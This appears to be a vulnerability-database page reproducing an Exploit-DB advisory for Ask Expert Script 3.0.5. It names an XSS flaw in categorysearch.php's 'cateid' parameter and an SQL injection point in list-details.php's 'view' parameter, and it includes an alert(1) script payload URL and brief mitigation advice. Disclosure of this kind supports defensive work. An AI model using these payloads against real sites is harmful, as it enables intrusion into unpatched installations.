header-logo
Suggest Exploit
vendor:
Ask Expert Script
by:
Mr Winst0n
8.8
CVSS
HIGH
Cross Site Scripting / SQL Injection
79, 89
CWE
Product Name: Ask Expert Script
Affected Version From: 3.0.5
Affected Version To: 3.0.5
Patch Exists: NO
Related CWE: N/A
CPE: a:phpscriptsmall:ask_expert_script
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux, Windows 8.1
2019

Ask Expert Script 3.0.5 – Cross Site Scripting / SQL Injection

The Ask Expert Script 3.0.5 is vulnerable to Cross Site Scripting and SQL Injection. An attacker can inject malicious JavaScript code in the 'cateid' parameter of the 'categorysearch.php' page and can inject malicious SQL code in the 'view' parameter of the 'list-details.php' page.

Mitigation:

Input validation should be used to prevent Cross Site Scripting and SQL Injection attacks. The application should also be tested for any security vulnerabilities.
Source

Exploit-DB raw data:

# Exploit Title: Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 19, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/ask-expert-script/
# Tested Version: 3.0.5
# Tested on: Kali linux, Windows 8.1 


# PoC:

# Cross Site Scripting:

# http://localhost/[PATH]/categorysearch.php?cateid=[XSS]
# http://localhost/[PATH]/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>

# SQL Injection:

# http://localhost/[PATH]/list-details.php?view=[SQL]

Navigation

Suggest Exploit

Services By CQR